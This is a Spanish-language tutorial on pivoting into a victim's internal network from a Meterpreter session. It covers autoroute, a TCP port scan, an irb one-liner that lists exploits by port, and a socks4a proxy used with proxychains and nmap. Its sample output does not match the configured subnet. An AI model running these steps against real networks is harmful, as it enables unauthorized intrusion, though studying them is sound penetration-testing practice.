Pivotenando con meterpreter y metasploit
Lo primero que hay que hacer el saber la ip local del equipo para ello en el meterpreter se coloca el comando ifconfig, el cual arrojara toda la información de lar tarjetas de red del equipo.
Interface 11 ============ Name : Controladora Gigabit Broadcom NetXtreme 57xx Hardware MAC : 05:13:72:2c:18:14 MTU : 1500 IPv4 Address : 169.254.200.42 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::1104:ed89:8675:c82a IPv6 Netmask : ffff:ffff:ffff:ffff::
ahora simplemete con el comando. autoroute el se encargara de generar el enrrutamiento dentro de metasploit.
run autoroute -s 169.254.0.0/24 run autoroute -p
este es simplemente un ejemplo. Y ahora ya se pueden utilizar los auxiliares que trae metasploit con la session de meterpreter. para poder utilizar los auxiliares hay que deja la session en modo demonio para que siga trabajando aun cuando no estemos dentro de la sesion. para ello se utiliza el comando.
background. Con este comando simplemente no devuelve a la otra interfaz.
Hay que utilizar el auxyliar llamada port_scan
de la siguiente forma lo llamamosm estando en la consola de metasploit
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
vamos a ver que opciones tiene
msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds
Ahora se tiene que signar los host a escanear y los pueryos y el numero de conurrencias
set rhost 169.254.0.0/24 set ports 1-80 set theards 20y ahora para que se ejecute se pude con el comando exploit o run pero como por etica se utiliza run
donde arrijara algo como esto
[*] 192.168.0.13:23 - TCP OPEN [*] 192.168.0.12:23 - TCP OPEN [*] 192.168.0.11:23 - TCP OPEN [*] 192.168.0.1:80 - TCP OPEN [*] 192.168.0.11:80 - TCP OPEN [*] 192.168.0.13:80 - TCP OPEN [*] 192.168.0.16:135 - TCP OPEN [*] 192.168.0.16:139 - TCP OPEN [*] 192.168.0.16:445 - TCP OPEN [*] 192.168.0.14:139 - TCP OPEN [*] 192.168.0.14:135 - TCP OPEN [*] 192.168.0.16:2968 - TCP OPEN [*] 192.168.0.16:3389 - TCP OPEN [*] 192.168.0.14:445 - TCP OPEN
Buscar Exploit para puertos en especifico
Estando en la consola de metasploit hacemos lo siguiente
msf > irb >> framework.exploits.each_module { |n,e| x=e.new; print_good("#{e.fullname}: #{x.datastore['RPORT']}") if x.datastore['RPORT'].to_i == 445 }; nil
donde el 445 es el puerto que seamos buscar en este caso voy a probar con ese 2968
Utilizar proxychains
Usar el auxyliar
use auxiliary/server/socks4a Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy
luego modificar el archivo de configuracion de proxychains y colocar el puerto 1080 o el que se le configure al socks para utilizar cualquier herramienta fuera del metasploit con el proxychains y redirija el trafico hacia la red interna de la victima
proxychains nmap -sT -P0 192.168.0.14